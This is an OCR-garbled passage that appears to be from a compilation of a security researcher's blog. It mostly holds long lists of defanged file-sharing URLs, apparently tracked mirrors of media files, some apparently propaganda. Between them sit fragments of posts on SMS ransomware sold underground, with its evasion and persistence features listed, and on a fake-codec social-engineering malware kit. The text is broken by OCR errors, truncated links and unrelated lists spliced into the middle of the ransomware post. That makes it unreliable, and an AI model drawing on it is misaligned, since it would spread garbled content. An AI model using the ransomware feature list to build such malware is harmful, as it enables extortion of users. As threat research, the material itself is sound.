ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_16.htm 
cos anaacie sioasgee aa se/ 10 crvares poceteuioctrareaccucter weal 

ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_30.htm 
ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_24.htm 


. http://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.htm 


a 
HF oO 


NPRPRPRPRP PHP HB 
SOONAHRWHN 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 


21. http://ddanchev. blogspot . com/2008/08/diverse-portfolio-of-fake-security.htm 
. http://ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 
. http://ddanchev. blogspot .com/ 


NN 
WN 


2459 


hxxp://rapidshare.com/files/47272989/anq2.rmvb.html 
hxxp://rapidshare.com/files/47273023/anq2.rmvb.html 
hxxp://uploadpalace.com/en/file/8459/anq2-rmvb.html 
hxxp://rapidshare.com/files/47211644/anq2.rmvb.html 
hxxp://rapidshare.com/files/47213290/anq2.rmvb.html 
hxxp://uploadpalace.com/en/file/8486/anq2-rmvb.html 
hxxp://uploadpalace.com/en/file/8485/anq2-rmvb.html 
hxxp://uploadpalace.com/en/file/8488/anq2-rmvb.html 
hxxp://uploadpalace.com/en/file/8487/anq2-rmvb.html 
hxxp://uploadpalace.com/en/file/8504/anq2-rmvb.html 
hxxp://uploadpalace.com/en/file/8507/anq2-rmvb.html 
hxxp://uploadpalace.com/en/file/8502/anq2-rmvb.html 
hxxp://uploadpalace.com/en/file/8503/anq2-rmvb.html 
hxxp://4filehosting.com/file/55475/wqw22222-zip.html 
hxxp://rapidshare.com/files/47228197/aweeee.zip.html 
hxxp://www.maxishare.net/en/file/1792/anq2-rmvb.html 
hxxp://www.maxishare.net/en/file/1822/anq2-rmvb.html 
hxxp://www.maxishare.net/en/file/1823/anq2-rmvb.html 
hxxp://www.maxishare.net/en/file/1825/anq2-rmvb.html 
hxxp://www.maxishare.net/en/file/1824/anq2-rmvb.html 
hxxp://www.maxishare.net/en/file/1813/anq2-rmvb.html 
hxxp://www.maxishare.net/en/file/1814/anq2-rmvb.html 
hxxp://www.maxishare.net/en/file/1826/anq2-rmvb.html 
hxxp://www.maxishare.net/en/file/182 7/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55826/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55836/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55852/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55855/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55854/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55917/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55919/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55920/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55921/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55889/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55896/anq2-rmvb.html 
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hxxp://www.4filehosting.com/file/55904/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55910/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55912/anq2-rmvb.html 
hxxp://www.4filehosting.com/file/55914/angq2-rmvb.html 
hxxp://rapidshare.com/files/47237512/q2w3333.zip.html 
hxxp://rapidshare.com/files/47243142/wqw22222.zip.html 
hxxp://www.archive.org/download/kmin-drk2/anq2.rmvb 
hxxp://www.archive.org/download/kmin-drk23/anq2.rmvb 
hxxp://www.archive.org/download/kmin-drk24/anq2.rmvb 
hxxp://www.archive.org/download/kmin-drk25/anq2.rmvb 
hxxp://www.archive.org/download/kmin-drk26/anq2.rmvb 
hxxp://www.uploadpalace.com/en/file/8496/anq2-rmvb.html 
hxxp://www.uploadpalace.com/en/file/8499/anq2-rmvb.html 
hxxp://www.uploadpalace.com/en/file/8512/anq2-rmvb.html 
hxxp://www.uploadpalace.com/en/file/8511/anq2-rmvb.html 
hxxp://www.megafileupload.com/en/fil...anq2-rmvb.html 
hxxp://www.uploadcomet.com/download....14785349ba76bd 
hxxp://www.upload.pk/freeupload/down...14785349ba76bd 
hxxp://xrl.us/3tp2 

hxxp://depositfiles.com/files/1410134 
hxxp://depositfiles.com/files/1412598 
hxxp://depositfiles.com/files/1412594 
hxxp://www.badongo.com/file/3958273 
hxxp://www.sendspace.com/file/d6i9cj 
hxxp://www.sendspace.com/file/kokm8f 
hxxp://www.sendspace.com/file/ne241v 
hxxp://www.sendspace.com/file/mhq9x4 
hxxp://www.megaupload.com/?d=O4BJI71)J 
hxxp://www.megaupload.com/?d=7EY1KCHI 
hxxp://www.megaupload.com/?d=OLW2V2LO 
hxxp://www.megaupload.com/?d=WTFS2EY] 
hxxp://www.megaupload.com/?d=8MVCOAFM 
hxxp://4filehosting.com/file/55344/ang3-rm.html 
hxxp://4filehosting.com/file/55340/ang3-rm.html 
hxxp://www.savefile.info/file/345 7/anq3-rm.html 
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hxxp://www.savefile.info/file/3471/ang3-rm.html 
hxxp://www.savefile.info/file/3470/ang3-rm.html 
hxxp://www.savefile.info/file/3469/ang3-rm.html 
hxxp://www.savefile.info/file/3472/anq3-rm.html 
hxxp://www.savefile.info/file/3480/anq3-rm.html 
hxxp://www.savefile.info/file/3481/ang3-rm.html 
hxxp://www.savefile.info/file/3482/ang3-rm.html 
hxxp://www.savefile.info/file/3483/ang3-rm.html 
hxxp://www.savefile.info/file/3484/anq3-rm.html 
hxxp://primeupload.com/file/128837/ang3.rm.html 
hxxp://rapidshare.com/files/47274460/anq3.rm.html 
hxxp://rapidshare.com/files/47271901/anqg3.rm.html 
hxxp://rapidshare.com/files/47271848/anq3.rm.html 
hxxp://rapidshare.com/files/47215239/anq3.rm.html 
hxxp://rapidshare.com/files/47211455/anqg3.rm.html 
hxxp://uploadpalace.com/en/file/8460/anq3-rm.html 
hxxp://uploadpalace.com/en/file/8489/anq3-rm.html 
hxxp://uploadpalace.com/en/file/8490/ang3-rm.html 
hxxp://uploadpalace.com/en/file/8491/anq3-rm.html 
hxxp://www.zshare.net/download/300346321e20a7/ 
hxxp://www.maxishare.net/en/file/1793/anq3-rm.html 
hxxp://www.4filehosting.com/file/55883/anq3-rm.html 
hxxp://www.4filehosting.com/file/55885/ang3-rm.html 
hxxp://www.4filehosting.com/file/55886/anq3-rm.html 
hxxp://www.4filehosting.com/file/55887/ang3-rm.html 
hxxp://www.4filehosting.com/file/55916/ang3-rm.html 
hxxp://www.4filehosting.com/file/55923/anq3-rm.html 
hxxp://www.4filehosting.com/file/55925/anq3-rm.html 
hxxp://www.4filehosting.com/file/55930/anq3-rm.html 
hxxp://www.4filehosting.com/file/55932/anq3-rm.html 
hxxp://www.4filehosting.com/file/55933/anq3-rm.html 
hxxp://www.maxishare.net/en/file/1828/anq3-rm.html 
hxxp://www.maxishare.net/en/file/1829/anq3-rm.html 
hxxp://www.maxishare.net/en/file/1830/anq3-rm.html 


hxxp://www.maxishare.net/en/file/1831/anq3-rm.html 
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hxxp://www.fileblob.com/download.php?id=77020121 
hxxp://www.upitus.com/download.php?file=3a9b629d 
hxxp://www.upitus.com/download.php?file=6d8b7144 
hxxp://www.upitus.com/download.php?file=d9576bfe 
hxxp://www.upitus.com/download.php?file=e56e8d4d 
hxxp://www.upitus.com/download.php?file=1ce20909 
hxxp://www.upitus.com/download.php?file=471fcbdf 
hxxp://www.upitus.com/download.php?file=ccd7c0b7 
hxxp://www.upitus.com/download.php?file=a365bfda 
hxxp://www.uploadpalace.com/en/file/8500/anq3-rm.html 
hxxp://www.uploadpalace.com/en/file/8501/anq3-rm.html 
hxxp://www.uploadpalace.com/en/file/8509/anq3-rm.html 
hxxp://www.uploadpalace.com/en/file/8510/anq3-rm.html 
hxxp://www.youploadit.com/download.php?id=44AF6080 
hxxp://www. youploadit.com/download.php?id=0B4C71E3 
hxxp://www. youploadit.com/download.php?id=D979B699 
hxxp://www.youploadit.com/download.php?id=1D34306D 
hxxp://www. youploadit.com/download.php?id=6B84D7DA 
hxxp://www. youploadit.com/download.php?id=C86BA4DD 
hxxp://www. youploadit.com/download.php?id=399037DC 
hxxp://www.youploadit.com/download.php?id=3C2DA97F 
hxxp://www.youploadit.com/download.php?id=20B56D72 
hxxp://www. youploadit.com/download.php?id=0A47BC2A 
hxxp://www.megafileupload.com/en/file/6208/ang3-rm.htm| 
hxxp://www.uploadcomet.com/download....ad48d738d4d6cb 
hxxp://www.upload.pk/freeupload/down...ad48d738d4d6cb 
hxxp://xrl.us/3tpy 

hxxp://file.uploadr.com/faa4 

hxxp://supasic.com/anq1 _rar18 
hxxp://www.savefile.com/files/948117 
hxxp://depositfiles.com/files/1410132 
hxxp://up.spbland.ru/files/070806136/ 
hxxp://www.sendmefile.com/00000000 
hxxp://www.badongo.com/file/3961737 
hxxp://www.badongo.com/file/3958251 
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hxxp://www.fileflyer.com/view/uL8xTAI 
hxxp://www.sendspace.com/file/7edgzo 
hxxp://www.bigupload.com/d=B6518B7D 
hxxp://www.mediafire.com/?2xazyxumudm 
hxxp://www.files.to/get/18134/7s8np9wsmu 
hxxp://www.megaupload.com/?d=D12ANLXN 
hxxp://www.megaupload.com/?d=UPJSX5FF 
hxxp://www.savefile.info/file/3473/anq1-3gp.html 
hxxp://www.savefile.info/file/3474/anq1-3gp.html 
hxxp://www.savefile.info/file/3476/anq1-3gp.html 
hxxp://www.savefile.info/file/3477/anq1-3gp.html 
hxxp://www.savefile.info/file/3485/anq1-3gp.html 
hxxp://www.savefile.info/file/3487/anq1-3gp.html 
hxxp://www.savefile.info/file/3486/anq1-3gp.html 
hxxp://www.savefile.info/file/3488/anq1-3gp.html 
hxxp://www.savefile.info/file/3491/anq1-3gp.html 
hxxp://www.savefile.info/file/3490/anq1-3gp.html 
hxxp://4filehosting.com/file/55342/anq1-3gp.html 
hxxp://4filehosting.com/file/55343/anq1-3gp.html 
hxxp://www.savefile.info/file/3458/anq1-3gp.html 
hxxp://primeupload.com/file/128839/anq1.3gp.html 
hxxp://www.zshare.net/download/30034340a77af5/ 
hxxp://d.turboupload.com/d/1962090/anq1.rar.html 
hxxp://uploadpalace.com/en/file/8493/anq1-3gp.html 
hxxp://uploadpalace.com/en/file/8495/anq1-3gp.html 
hxxp://uploadpalace.com/en/file/8494/anq1-3gp.html 
hxxp://rapidshare.com/files/47211443/anq1.3gp.html 
hxxp://rapidshare.com/files/47214609/anq1.3gp.html 
hxxp://uploadpalace.com/en/file/8461/anq1-3gp.html 
hxxp://www.upitus.com/download.php?file=6ef52c03 
hxxp://www.upitus.com/download.php?file=f843c26b 
hxxp://www.upitus.com/download.php?file=06aaa2db 
hxxp://www.upitus.com/download.php?file=8f9b3c7f 
hxxp://www.upitus.com/download.php?file=bfe55427 
hxxp://www.upitus.com/download.php?file=315f0320 
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hxxp://www.upitus.com/download.php?file=9498bb92 
hxxp://www.fileblob.com/download.php?id=8E580FBO 
hxxp://www.upitus.com/download.php?file=19778dda 
hxxp://www.upitus.com/download.php?file=d54b3bd4 
hxxp://www.keepmyfile.com/download/2adeb21785900 
hxxp://www.maxishare.net/en/file/1794/anq1-3gp.html 
hxxp://www.maxishare.net/en/file/1833/anq1-3gp.html 
hxxp://www.maxishare.net/en/file/1834/anq1-3gp.html 
hxxp://www.maxishare.net/en/file/1835/anq1-3gp.html 
hxxp://www.maxishare.net/en/file/1836/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55897/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55898/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55899/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55900/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55939/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55941/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55942/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55944/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55945/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55949/anq1-3gp.html 
hxxp://www.4filehosting.com/file/55951/anq1-3gp.html 
hxxp://www.sharebigfile.com/file/201723/anq1-rar.html 
hxxp://www.fileblob.com/download.php?id=DOC39CD3 
hxxp://www.archive.org/download/kmin-drk2/anq1.3gp 
hxxp://www.archive.org/download/kmin-drk23/anq1.3gp 
hxxp://www.archive.org/download/kmin-drk24/anq1.3gp 
hxxp://www.archive.org/download/kmin-drk25/anq1.3gp 
hxxp://www.archive.org/download/kmin-drk26/anq1.3gp 
hxxp://www. youploadit.com/download.php?id=A9F95C31 
hxxp://www. youploadit.com/download.php?id=168CEAD5 
hxxp://www.youploadit.com/download.php?id=3F98E991 
hxxp://www. youploadit.com/download.php?id=FF979BF1 
hxxp://www. youploadit.com/download.php?id=37C3E61B 
hxxp://www.youploadit.com/download.php?id=ED60935D 
hxxp://www.youploadit.com/download.php?id=07D69C7E 
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hxxp://www.youploadit.com/download.php?id=7CB5ED33 
hxxp://www.youploadit.com/download.php?id=DD64427B 
hxxp://www.youploadit.com/download.php?id=830D0EC3 
hxxp://tornadodrive.com/download.php/3136/anq1.rar.html 
hxxp://www.megafileupload.com/en/fil.../anql-3gp.html 
hxxp://www.bestsharing.com/files/Fgs.../anq1.rar.html 
hxxp://www.justupit.com/db895ffe326e...a6c9bdcc5b6a47 
hxxp://www.viprasys.com/host/downloa...le=955anq1.3gp 
hxxp://www.rapidshare.in/download.ph...66139eeac25fec 
hxxp://www.uploadcomet.com/download....5b20bdf3be6cf2 
hxxp://www.upload.pk/freeupload/down...5b20bdf3be6cf2 
hxxp://www.babainline.org 
hxxp://walaabaraa.wordpress.com 
hxxp://wordpress.com/tag/al-sham/ 
hxxp://wordpress.com/tag/lubnan/ 
hxxp://wordpress.com/tag/movements/ 
hxxp://www.megashare.com/245916 
hxxp://www.megashare.com/245921 
hxxp://www.badongo.com/vid/440162 
hxxp://depositfiles.com/files/1388313 
hxxp://depositfiles.com/files/1388314 
hxxp://depositfiles.com/files/1388325 
hxxp://depositfiles.com/files/1388331 
hxxp://depositfiles.com/files/1388336 
hxxp://depositfiles.com/files/1388841 
hxxp://www.sendspace.com/file/jjtsp1 
hxxp://www.sendspace.com/file/8qf2li 
hxxp://www.fileflyer.com/view/Ef7 XaAj 
hxxp://www.sendspace.com/file/iu8cci 
hxxp://www.sendspace.com/file/craf4g 
hxxp://www.sendspace.com/file/j4uvrd 
hxxp://www.sendspace.com/file/sOjpk8 
hxxp://www.fileflyer.com/view/1jFeaAv 
hxxp://www.sendspace.com/file/wesz8r 


hxxp://www.sendspace.com/file/9a4ce4 
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hxxp://www.sendspace.com/file/proom7 
hxxp://www.sendspace.com/file/7 5mok7 
hxxp://www.sendspace.com/file/d1codd 
hxxp://www.fileflyer.com/view/xzXXEAq 
hxxp://www.megaupload.com/?d=JFPJJK6F 
hxxp://www.megaupload.com/?d=5QZ10DIO 
hxxp://www.megaupload.com/?d=KA2LX94Y 
hxxp://www.megaupload.com/?d=2GF6GEOT 
hxxp://www.megaupload.com/?d=UP1T1PKX 
hxxp://www.megaupload.com/?d=YMCX3BOA 
hxxp://www.megaupload.com/?d=TXGW68DS 
hxxp://www.zshare.net/video/2960743508c5fa/ 
hxxp://picshome.com/download.php?id=OAAE6AAE1 
hxxp://picshome.com/download.php?id=27E076B41 
hxxp://www.upitus.com/download.php?file=8f2a3dd5 
hxxp://www.savefile.info/file/3393/caf4af9db3-wmv.html 
hxxp://4filehosting.com/file/53528/caf4af9db3-wmv.html 
hxxp://4filehosting.com/file/53527/caf4af9db3-wmv.html 
hxxp://www.savefile.info/file/3399/caf4af9db3-wmv.html 
hxxp://www.savefile.info/file/3400/caf4af9db3-wmv.html 
hxxp://rapidshare.com/files/46623366/caf4af9db3.wmv.html 
hxxp://rapidshare.com/files/46623385/caf4af9db3.wmv.html 
hxxp://rapidshare.com/files/46623290/caf4af9db3.wmv.html 
hxxp://rapidshare.com/files/46623060/caf4af9db3.wmv.html 
hxxp://rapidshare.com/files/46630080/caf4af9db3.wmv.html 
hxxp://rapidshare.com/files/46634838/caf4af9db3.wmv.html 
hxxp://uploadpalace.com/en/file/8347/caf4af9db3-wmv.html 
hxxp://www.viprasys.com/host/download.php?file=288caf4af9db3.wmv 
hxxp://www.uploadcomet.com/download.php?file=b00374b6172c96bd069f35c9b7d81b 2b 


hxxp://www.upload.pk/freeupload/download.php?file=b00374b6172c96bd069f35c9b 
7d81b2b 


hxxp://www.mercuryupload.com/media/download.php?file=b00374b6172c96bd069f35 
c9b7d81b2b 


hxxp://file.uploadr.com/f9d1 
hxxp://depositfiles.com/files/1388850 
hxxp://up.spbland.ru/files/070803151/ 
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hxxp://supasic.com/db65cc7f81 _rar93 
hxxp://www.badongo.com/file/3930184 
hxxp://www.sendspace.com/file/edf4bb 
hxxp://www.fileflyer.com/view/vSOqdBS 
hxxp://www.megaupload.com/?d=BTZ9A8N6 
hxxp://www.megaupload.com/?d=UTEJC2Q2 
hxxp://www.zshare.net/download/2960785b1bc74a/ 
hxxp://picshome.com/download.php?id=D4C8F5311 
hxxp://picshome.com/download.php?id=CDF761CD1 
hxxp://www.upitus.com/download.php?file=3be43d82 
hxxp://www.savefile.info/file/3394/db65cc7f81-3gp.html 
hxxp://4filehosting.com/file/53533/db65cc7f81-3gp.html 
hxxp://4filehosting.com/file/53532/db65cc7f81-3gp.html 
hxxp://primeupload.com/file/128645/db65cc7f81.rar.htm! 
hxxp://primeupload.com/file/128589/db65cc7f81.3gp.htm! 
hxxp://d.turboupload.com/d/1960025/db65cc7f81.rar.html 
hxxp://rapidshare.com/files/46630714/db65cc7f81.3gp.html 
hxxp://rapidshare.com/files/46635116/db65cc7f81.3gp.html 
hxxp://uploadpalace.com/en/file/8348/db65cc7f81-3gp.html 
hxxp://www21.rapidupload.com/d.php?file=dl &amp;filepath=39449 
hxxp://www.viprasys.com/host/download.php?file=418db65cc7f81.3gp 
hxxp://www.bestsharing.com/files/cB9UYa313655/db65cc7f81.rar.html 
hxxp://www.uploadcomet.com/download.php?file=8 7eeacO8f0f3c3b30a3c339f1a904c ad 
hxxp://www.upload.pk/freeupload/download.php?file=87eeacO08f0f3c3b30a3c339f1 a904cad 
hxxp://xrl.us/3tpj 
hxxp://www.megashare.com/248128 
hxxp://www.megashare.com/248134 
hxxp://depositfiles.com/files/1408395 
hxxp://www.fileflyer.com/view/r23IHAu 
hxxp://www.badongo.com/file/3956299 
hxxp://www.fileflyer.com/view/YwdlaAG 
hxxp://www.sendspace.com/file/cwc3yc 
hxxp://www.fileflyer.com/view/1JUFHAG 
hxxp://www.megaupload.com/?d=X9MCB96P 
hxxp://www.megaupload.com/?d=WL7FDFM} 
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hxxp://www.zshare.net/download/29988651e36c01/ 
hxxp://picshome.com/download.php?id=AC02353A1 
hxxp://www.upitus.com/download.php?file=d9696d89 
hxxp://www.fileblob.com/download.php?id=54C42871 
hxxp://4filehosting.com/file/55022/eba3ea8df0-rar.html 
hxxp://4filehosting.com/file/55023/eba3ea8df0-rar.html 
hxxp://www.savefile.info/file/3453/eba3ea8df0-rar.html 
hxxp://primeupload.com/file/128818/eba3ea8df0.rar.html 
hxxp://www.archive.org/download/iedv...ighquality.wmv 
hxxp://ia300116.us.archive.org/3/ite...ighquality.wmv 
hxxp://www.archive.org/download/prey140/Diala.wmv 
hxxp://ia341206.us.archive.org/1/ite...y140/Diala.wmv 
hxxp://www.archive.org/details/prey140 
hxxp://www.archive.org/details/iedvstheing 
hxxp://xrl.us/3tph 

hxxp://slil.ru/24706650 

hxxp://file.uploadr.com/fa8e 
hxxp://up.spbland.ru/files/07080665/ 
hxxp://depositfiles.com/files/1408251 
hxxp://supasic.com/cal650817c _rar62 
hxxp://www.badongo.com/file/3956144 
hxxp://www.sendspace.com/file/y27ojp 
hxxp://www.fileflyer.com/view/pNqkACg 

hxxp://www. mediafire.com/?42ncmfki2xy 
hxxp://www.megaupload.com/?d=5UDHYPCZ 
hxxp://www.megaupload.com/?d=70VOQ9A4 
hxxp://www.send-file.com/68AD4DAE67A1D0BD 
hxxp://www.hostfilez.com/download.php?file=810 
hxxp://www.zshare.net/download/299858581526be/ 
hxxp://www.upitus.com/download.php?file=0c42b777 
hxxp://www.fileblob.com/download.php?id=1C9F110B 
hxxp://4filehosting.com/file/55011/ca1650817c-3gp.html 
hxxp://4filehosting.com/file/55013/ca1650817c-3gp.html 
hxxp://www.savefile.info/file/3452/ca1650817c-3gp.html 
hxxp://primeupload.com/file/128847/ca1650817c.rar.html 
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5.7.12 5th SMS Ransomware Variant Offered for Sale (2009-07-29 13:17) 


Axtusuposate 


"Your system has been blocked because it is running a pirated copy of Windows. In order to 
unblock it, enter the activation code sent to you by SMS-ing the following number." 


Demand and [1]Jemerging business models based on micro-payment ransom meet sup- 
ply, with yet another SMS-based ransomware variant offered for sale ( $25). Just like in 
previous underground market propositions, this one comes with a value-added service in the 
form of managed undetected binaries on a daily basis for an extra $5 for an undetected copy. 
It’s worth pointing out that due to the customization offered, their original layouts and the 
error messages will look a lot different once their customers get hold of the ransomware. 


Key features include: 
- protecting against repeated infection through Mutex 


- pops-up on the top of all windows 
- disables safe mode, as well as possible key combinations attempting to bypass the window 
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hxxp://d.turboupload.com/d/1961956/ca1650817c.rar.html 
hxxp://primeupload.com/file/128813/ca1650817c.3gp.html 
hxxp://download.al-islaam.com/audiovideo/qoran/alquraan/html/mesharycompleet/ 1.html 
hxxp://www.salaattime.com/anwar.html 

hxxp://asdd.com 

hxxp://www.streetdawah.com 
hxxp://english.islamway.com/bindex.php?section=echapters &amp;recitor id=7 
hxxp://binthaya.wordpress.com 

hxxp://www.kalamullah.com 

hxxp://www.streetdawah.com/faisal.html 


hxxp://islambase.co.uk/index.php?option=com _content &amp;task=category 
&amp;sectionid=33 &amp;id=76 &amp;ltemid=120 


hxxp://www.divshare.com/ 
hxxp://www.islamchat.s4.bizhat.com 
hxxp://www.divshare.com 


hxxp://video.google.com/videoplay?docid=-4885395591752851899 
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- adds itself as a trusted executable/excluded one in Windows Firewall 

- variety of non-intrusive auto-starting/executable injecting capabilities 

- Rotx encryption for the activation codes 

- ability to embedd more than one activation code 

- monitors and automatically blocks process names of tools that could allow removal 

- complete removal of the code from the system once the correct activation code is entered 

- zero detection rate of a sampled binary - of course the advertiser is biased and he didn’t 
bother including reference to the service he used (Virustotal, NoVirusThanks.org etc.) 


Despite several isolated cases where the originally Russian-based ransomware is affect- 
ing international English-speaking users, the campaigns are primarily targeting Russian 
speaking users - at least for the time being until the malware authors or their customers start 
localizing it. This emerging micro-payment ransomware business model is the direct result of 
largely unregulated market segments allowing literally anyone to get hold of a premium and 
automatically managed number in order to facilitate it. 


Related posts: 

[2]4th SMS Ransomware Variant Offered for Sale 

[3]3rd SMS Ransomware Variant Offered for Sale 

[4]SMS Ransomware Source Code Now Offered for Sale 

[5]New ransomware locks PCs, demands premium SMS for removal 


This post has been reproduced from [6]Dancho Danchev'’s blog. 
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The [1]standardization through [2]template-ization of bogus codec/flash player/video pages, 
taking place during the past two years, has exponentially increased the [3]efficiency levels of 
malware campaigns relying exclusively on [4]social engineering. 


Just like [5]phishing pages being commodity, these commodity spoofs of legitimate soft- 
ware/plugins relying on "visual social engineering" represent a market segment by themselves, 
one that some cybercriminals have been attempting to monetize for a while. 
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Case in point - their latest attempt to do so comes in the form of the first social engineering 
driven web malware exploitation kit. 


My Fake The Onginal 
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instal Now 


Despite that the kit’s author has ripped off a well known exploits-serving malware kit’s 
statistics interface, what’s unique about this release is the fact that the exploit modules come 
in the form of "Missing Flash Player", "Outdated Flash Player", "Missing Video Codec", 
"Outdated Video Codec", "Codec Required" modules. 


These very same modules represent the dominant social engineering attack vector on the 
Internet due to the quality of the spoofs and the end users’ gullibility while self-infecting 
themselves. For the time being, the author appears to be an opportunist rather than 
someone interested in setting new benchmarks for standardization social engineering by 
using the efficiency and delivery methods offered by a web malware exploitation kit. 
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SECRET VIDEO 


Your Flash player is out of date ! 


You must have the new Plug-in 
Flash Player to watch this Video. 


Click Here to Download 


WE ARE NOT ALONE 


Interestingly, a huge number of fake codec serving web sites are already detecting the 
OS/Browser of the visitor, and serving [6]Mac OS X based malware or Windows based 
malware based on the detection. This fact, as well as the fact that visual spoofs of OS X like 
dialogs are also getting template-ized are not a coincidence - it’s a signal for an efficient and 
social engineering driven malware delivery mechanism in the works. The development of the 
kit will be monitored and updates posted - if any. 


Meanwhile, the recent blackhat SEO campaign which attempted to hijack ’Harry Potter and 
the Half-Blood Prince’ related traffic is a good example on how despite the magnitude of the 
Campaign - hundreds of thousands of indexed and malware serving pages - due to the 
manual campaign management, its centralized nature makes it easier to shut down. 
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hxxp://uploadpalace.com/en/download.php?id=EFB62BF01 
hxxp://www.titanicshare.com/download.php?id=6C3514F41 
hxxp://www.titanicshare.com/download.php?id=F2BF8CED1 
hxxp://www.titanicshare.com/download.php?id=929ED2531 
hxxp://www.titanicshare.com/download.php?id=3C722D711 
hxxp://www.titanicshare.com/download.php?id=42062C3B1 
hxxp://www.titanicshare.com/download.php?id=C80DADA91 
hxxp://www.titanicshare.com/download.php?id=3B3258D81 
hxxp://www.titanicshare.com/download.php?id=C3EA90E31 
hxxp://www.titanicshare.com/download.php?id=F55DCE4B1 
hxxp://www.titanicshare.com/download.php?id=53DFOD2F1 
hxxp://www.titanicshare.com/download.php?id=C8617F8C1 
hxxp://www.titanicshare.com/download.php?id=97B1BCBA1 
hxxp://www.titanicshare.com/download.php?id=E2692BD61 
hxxp://www.titanicshare.com/download.php?id=FD2C07151 
hxxp://www.titanicshare.com/download.php?id=85847DAE1 
hxxp://www.afilehost.com/file/6213/e0a5eb0d47-rar.html 
hxxp://www.savefile.info/file/1355/e0a5eb0d47-rar.html 
hxxp://primeupload.com/file/115052/e0a5eb0d47.rar.htm! 
hxxp://4filehosting.com/file/13177/e0a5eb0d47-rar.html 
hxxp://www7.rapidupload.com/d.php?fi...filepath=28210 
hxxp://www.bestsharing.com/files/bA8...J7ee3.rar.html 
hxxp://215.zupload.com/download.php?...filepath=41238 
hxxp://rapidshare.com/files/32965347...b0d47.rar.html 
24644 


hxxp://www.useboost.com/336c4495cd92.../j7ee3rar.html 
hxxp://www.megashare.com/180505 
hxxp://www.megashare.com/180491 
hxxp://www.megashare.com/180492 
hxxp://www.mytempdir.com/1333665 
hxxp://www.badongo.com/file/3118496 
hxxp://www.badongo.com/file/3118512 
hxxp://www.badongo.com/file/3118504 
hxxp://www.badongo.com/file/3117356 
hxxp://depositfiles.com/files/889251 
hxxp://depositfiles.com/files/889281 
hxxp://www.sendspace.com/file/t954jy 
hxxp://www.sendspace.com/file/475gsr 
hxxp://www.sendspace.com/file/b059uw 
hxxp://www.megaupload.com/?d=3578M4D9 
hxxp://www.megaupload.com/?d=JIYKM6K9 
hxxp://www.megaupload.com/?d=PZP3K18G 
hxxp://www.megaupload.com/?d=1C8M62P1 
hxxp://www.megaupload.com/?d=YAOEOUIC 
hxxp://www.megaupload.com/?d=QJL27SDN 
hxxp://www.megaupload.com/?d=AV6M7B7A 
hxxp://www.fileflyer.com/view/tOtoJAU 
hxxp://www.megaupload.com/?d=85GII2E4 
hxxp://www.megaupload.com/?d=6B5BMAOL 
hxxp://www.fileflyer.com/view/2ttSNAF 
hxxp://www.filefactory.com/file/a1c590/ 
hxxp://supasic.com/download.php?file=782119 
hxxp://media9.filewind.com/g.php?filepath=12077 
hxxp://medial1.filewind.com/g.php?filepath=2190 
hxxp://www.furk.net/jkjkllllliuy _104477.rar.html 
hxxp://www.afilehost.com/file/5967/a365f7254b-rar.html 
hxxp://www.zshare.net/download/eshtebak _mosel-rar.html 
hxxp://www.zshare.net/download/eshte...l-rar-zs6.html 
hxxp://www.zshare.net/download/eshte...l-rar-s5a.html 
hxxp://d.turboupload.com/d/1810976/e...mosel.rar.html 
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hxxp://d.turboupload.com/d/1811013/e...mosel.rar.html 
hxxp://s29.quicksharing.com/v/266811...IIIIl.rar.html 
hxxp://rapidshare.com/files/32399309...mosel.rar.html 
hxxp://s9.quicksharing.com/v/7989730...mosel.rar.html 
hxxp://s15.quicksharing.com/v/740294...mosel.rar.html 
hxxp://s25.quicksharing.com/v/420142...mosel.rar.html 
hxxp://s28.quicksharing.com/v/754874...mosel.rar.html 
hxxp://z30.zupload.com/download.php?...filepath=27846 
hxxp://231.zupload.com/download.php?...filepath=36237 
hxxp://rapidshare.com/files/32400312...7254b.rar.html 
hxxp://file.uploadr.com/e5f6 
hxxp://www.unbase.com/n/2320951242 
hxxp://www.badongo.com/file/3118735 

hxxp://www. badongo.com /file/3118737 

hxxp://www. badongo.com /file/3118736 

hxxp://www. badongo.com /file/3118739 
hxxp://up.spbland.ru/files/07052118/ 
hxxp://www.sendspace.com/file/t6ufck 
hxxp://www.speedshare.org/xzZz|IPY9CE 
hxxp://www.megaupload.com/?d=PM4YQMWW 
hxxp://www.megaupload.com/?d=OVG3A47M 
hxxp://www.megaupload.com/?d=6WOPP47U 
hxxp://www.megaupload.com/?d=P4680RNO 
hxxp://www.fileflyer.com/view/4d5hyB3 
hxxp://supasic.com/download.php?file=616657 
hxxp://www.zshare.net/download/774774-rar.html 
hxxp://www.afilehost.com/file/5968/774774-rar.html 
hxxp://d.turboupload.com/d/1811323/774774.rar.html 
hxxp://uploaded.to/?id=1waix4woiuinyged9tb19rc38jngov3o0 
hxxp://www.sharebigfile.com/file/172909/774774-rar.html 
hxxp://www.bestsharing.com/files/oeQ...74774.rar.html 
hxxp://Z08.zupload.com/download.php?...filepath=59115 
hxxp://www.egoshare.com/89b6364af299...774774rar.html 
